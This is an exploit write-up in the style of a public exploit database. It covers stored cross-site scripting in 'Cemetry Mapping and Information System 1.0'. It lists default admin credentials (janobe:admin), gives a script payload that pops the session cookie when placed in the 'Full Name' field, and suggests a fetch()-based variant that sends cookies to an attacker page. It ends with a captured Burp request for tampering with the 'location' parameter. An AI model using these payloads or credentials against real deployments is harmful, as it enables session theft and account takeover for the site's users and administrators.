# Exploit Title: Cemetry Mapping and Information System 1.0 - Multiple Stored Cross-Site Scripting  
# Exploit Author: Mesut Cetin  
# Date: 2021-01-10  
# Vendor Homepage:  
# Software Link:  
# Affected Version: 1.0  
# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0, Burp Suite Professional v.1.7.34   
Affected parameter: "full name", "location"  
Proof of concept:  
1. Login under admin panel, http://localhost/CemeteryMapping/admin/login.php, with default credentials janobe:admin  
2. Click on "Deceased Persons"  
3. Choose one of the users and click on their names to edit it  
4. In the field "Full Name" insert the payload: <script>alert(document.cookie)</script>  
5. Save and open the webpage under http://localhost/CemeteryMapping/index.php?q=person  
6. You will receive the PHPSESSID cookie as alert. The cookie values can be redirected to attacker page by using payloads like <script src="data:application/javascript,fetch(`${document.cookie}`)"></script>  
To manipulate the "location" parameter, we will use Burp Suite. Capture the request with Burp:  
POST /CemeteryMapping/admin/person/controller.php?action=edit HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 149  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/CemeteryMapping/admin/person/index.php?view=edit&id=1  
Cookie: PHPSESSID=h9smkdr8dvjhsjviugnvot261m  
Upgrade-Insecure-Requests: 1  
And forward the request. The cookie values will be displayed on screen.